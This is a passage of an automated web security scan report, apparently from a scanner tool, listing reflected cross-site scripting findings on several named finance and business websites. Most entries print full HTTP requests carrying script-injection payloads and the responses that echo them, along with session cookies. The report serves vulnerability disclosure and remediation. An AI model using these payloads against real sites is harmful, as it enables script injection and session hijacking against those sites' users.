The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cbc8"><script>alert(1)</script>473ebcbf25d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/3299533.html?3cbc8"><script>alert(1)</script>473ebcbf25d=1 HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 17:04:56 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 17:04:56 GMT Content-Length: 13628 Connection: close Set-Cookie: adc=RSP; path=/;
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="1b0d0ec2fefe4b82a285 ...[SNIP]... a target="_blank" href="http://twitter.com/home?status=Check out this 'Who is JTWROS and Why are They Listed on My Account Statement?' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3299533.html?3cbc8"><script>alert(1)</script>473ebcbf25d=1'"> ...[SNIP]...
1.493. http://www.myfinances.com/blog/3299543.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.myfinances.com
Path:
/blog/3299543.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86ca0"><script>alert(1)</script>6a9de3808f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/3299543.html?86ca0"><script>alert(1)</script>6a9de3808f3=1 HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 17:05:03 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 17:05:03 GMT Content-Length: 13601 Connection: close Set-Cookie: adc=RSP; path=/;
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="1b0d0ec2fefe4b82a285 ...[SNIP]... <a target="_blank" href="http://twitter.com/home?status=Check out this 'How to Choose an Appropriate Target Date Fund' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3299543.html?86ca0"><script>alert(1)</script>6a9de3808f3=1'"> ...[SNIP]...
1.494. http://www.myfinances.com/blog/3299553.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.myfinances.com
Path:
/blog/3299553.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f745d"><script>alert(1)</script>799a50af86f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/3299553.html?f745d"><script>alert(1)</script>799a50af86f=1 HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 17:04:54 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 17:04:54 GMT Content-Length: 13663 Connection: close Set-Cookie: adc=RSP; path=/;
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="1b0d0ec2fefe4b82a285 ...[SNIP]... <a target="_blank" href="http://twitter.com/home?status=Check out this 'How To Choose Between a Traditional 401(K) and a Roth 401(K)' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3299553.html?f745d"><script>alert(1)</script>799a50af86f=1'"> ...[SNIP]...
1.495. http://www.myfinances.com/budget.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.myfinances.com
Path:
/budget.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91d41"><script>alert(1)</script>3d8e0c43e90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /budget.php?91d41"><script>alert(1)</script>3d8e0c43e90=1 HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 15:55:20 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 15:55:20 GMT Content-Length: 21653 Connection: close Set-Cookie: ARPT=VRWOZXS192.168.100.28CKOUU; path=/ Set-Cookie: PHPSESSID=r5fgdi9rsbvhrv1uang897d6f7; path=/ Set-Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136 Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-ep3Zgx3x55wzjtYGmmA8IHHkMtnMePS5Wjisha7wpvxzTpOwlpCxTnjUY2Nzh3vrxUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQKB8ZM44-LhR9KSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn7X_rYpwmUw7b4CTEiWPaQLH4pwjPOr-mcyYKvi6WopOasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/ Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-ep3Zgx3x55wzjtYGmmA8IHHkMtnMePS5Wjisha7wpvxzTpOwlpCxTnjUY2Nzh3vrxUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQKB8ZM44-LhR9KSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn7X_rYpwmUw7b4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/ Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-ep3Zgx3x55wzjtYGmmA8IHHkMtnMePS5Wjisha7wpvxzTpOwlpCxTnjUY2Nzh3vrxUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQKB8ZM44-LhR9KSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn7X_rYpwmUw7b4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/ Set-Cookie: adc=RSP; path=/;
The value of the query request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e9843'><script>alert(1)</script>2707c201b22 was submitted in the query parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /budget.php?query=savings+accountse9843'><script>alert(1)</script>2707c201b22&mfid=mf-4d404e8fe4f0d&mfs=adwc&&client=ca-dp-r-mark03_3ph_js HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 15:55:41 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 15:55:41 GMT Content-Length: 19651 Connection: close Set-Cookie: ARPT=VRWOZXS192.168.100.28CKOUU; path=/ Set-Cookie: PHPSESSID=8mri1qtefnba9k49k4ep3nl8h2; path=/ Set-Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136 Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-eno6Jjl93N8GpduxNYGBxG5Y6FFxht_Njk7BPyPmzIQKHUnSLStdd3m_SBtFRIWv2UYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJMGm4g2vKixNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn5Ae7198oJNXL4CTEiWPaQLH4pwjPOr-mcyYKvi6WopOasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/ Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-eno6Jjl93N8GpduxNYGBxG5Y6FFxht_Njk7BPyPmzIQKHUnSLStdd3m_SBtFRIWv2UYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJMGm4g2vKixNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn5Ae7198oJNXL4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/ Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-eno6Jjl93N8GpduxNYGBxG5Y6FFxht_Njk7BPyPmzIQKHUnSLStdd3m_SBtFRIWv2UYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJMGm4g2vKixNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn5Ae7198oJNXL4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/ Set-Cookie: adc=RSP; path=/;
The value of the query request parameter is copied into the HTML document as plain text between tags. The payload a2ce6<script>alert(1)</script>826352099bb was submitted in the query parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /budget.php?query=savings+accountsa2ce6<script>alert(1)</script>826352099bb&mfid=mf-4d404e8fe4f0d&mfs=adwc&&client=ca-dp-r-mark03_3ph_js HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 15:55:45 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 15:55:45 GMT Content-Length: 19629 Connection: close Set-Cookie: ARPT=VRWOZXS192.168.100.26CKOUQ; path=/ Set-Cookie: PHPSESSID=u15624i2oae1adjjrl0fa5mn65; path=/ Set-Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136 Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-enLhu7KjEvXpkJfrfAQOnZ1eEyEUcIq0WVmXir4NGwcZbmUHGK2l4Dwd73MuXjqeOUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJ6pTPd4ZzeqNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn6nygrYAfQJ-r4CTEiWPaQLH4pwjPOr-mcyYKvi6WopOasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/ Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-enLhu7KjEvXpkJfrfAQOnZ1eEyEUcIq0WVmXir4NGwcZbmUHGK2l4Dwd73MuXjqeOUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJ6pTPd4ZzeqNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn6nygrYAfQJ-r4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/ Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-enLhu7KjEvXpkJfrfAQOnZ1eEyEUcIq0WVmXir4NGwcZbmUHGK2l4Dwd73MuXjqeOUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJ6pTPd4ZzeqNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn6nygrYAfQJ-r4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/ Set-Cookie: adc=RSP; path=/;
1.498. http://www.myfinances.com/contact.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.myfinances.com
Path:
/contact.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 613cb'><script>alert(1)</script>8f2541e63ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact.html?613cb'><script>alert(1)</script>8f2541e63ae=1 HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 17:02:44 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 17:02:44 GMT Content-Length: 8051 Connection: close Set-Cookie: adc=RSP; path=/;
1.499. http://www.openforum.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.openforum.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54350'-alert(1)-'b64566be317 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?54350'-alert(1)-'b64566be317=1 HTTP/1.1 Host: www.openforum.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Thu, 03 Feb 2011 13:50:31 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 13:50:31 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/ Set-Cookie: BIGipServerAmex=2735450304.20480.0000; path=/ Content-Length: 102188
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4b2f'-alert(1)-'731207dc1c was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?cid=inav_homea4b2f'-alert(1)-'731207dc1c&inav=menu_business_openforum HTTP/1.1 Host: www.openforum.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 SSL: True Expires: Thu, 03 Feb 2011 13:50:42 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 13:50:42 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/ Set-Cookie: BIGipServerAmex=2785781952.20480.0000; path=/ Content-Length: 102363
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the inav request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1db04'-alert(1)-'749ae354a20 was submitted in the inav parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?cid=inav_home&inav=menu_business_openforum1db04'-alert(1)-'749ae354a20 HTTP/1.1 Host: www.openforum.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 SSL: True Expires: Thu, 03 Feb 2011 13:50:48 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 13:50:48 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/ Set-Cookie: BIGipServerAmex=2819336384.20480.0000; path=/ Content-Length: 102377
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
1.502. https://www.openforum.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.openforum.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a374f'-alert(1)-'7289baab9b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?a374f'-alert(1)-'7289baab9b9=1 HTTP/1.1 Host: www.openforum.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 SSL: True Expires: Thu, 03 Feb 2011 13:50:35 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 13:50:35 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/ Set-Cookie: BIGipServerAmex=2836113600.20480.0000; path=/ Content-Length: 102556
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the campaignId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aac2e"%3balert(1)//8d034beed23 was submitted in the campaignId parameter. This input was echoed as aac2e";alert(1)//8d034beed23 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-listings?tsrc=SP&campaignId=SP_FT_AddEditaBusinessaac2e"%3balert(1)//8d034beed23 HTTP/1.1 Host: www.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=check#true#1296759636|session#1296759528614-838261#1296761436;
Response
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:16:53 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Get Your Free Business Listing | SuperMedia.com Advertising</title>
The value of the tsrc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20b9c"%3balert(1)//623d3053168 was submitted in the tsrc parameter. This input was echoed as 20b9c";alert(1)//623d3053168 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-listings?tsrc=SP20b9c"%3balert(1)//623d3053168&campaignId=SP_FT_AddEditaBusiness HTTP/1.1 Host: www.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=check#true#1296759636|session#1296759528614-838261#1296761436;
Response
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:16:48 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Get Your Free Business Listing | SuperMedia.com Advertising</title>
The value of the &tsrc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 198c8"%3balert(1)//96cb9badcf2 was submitted in the &tsrc parameter. This input was echoed as 198c8";alert(1)//96cb9badcf2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-listings/business-profile?&tsrc=SP198c8"%3balert(1)//96cb9badcf2&campaignId=BP:Update+Your+Profile+Top HTTP/1.1 Host: www.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 17:05:34 GMT Set-Cookie: JSESSIONID=B9B8A68CD261E7EEF56BA494FDEE7747.app3-a1; Path=/ Set-Cookie: trafficSource="SP198c8\";alert(1)//96cb9badcf2"; Expires=Sat, 05-Mar-2011 17:05:33 GMT; Path=/ Set-Cookie: CstrStatus=U; Expires=Sat, 05-Mar-2011 17:05:33 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Content-Language: en Connection: close Set-Cookie: NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139f45525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Your Business Profile | SuperMedia.com Advertising</title>
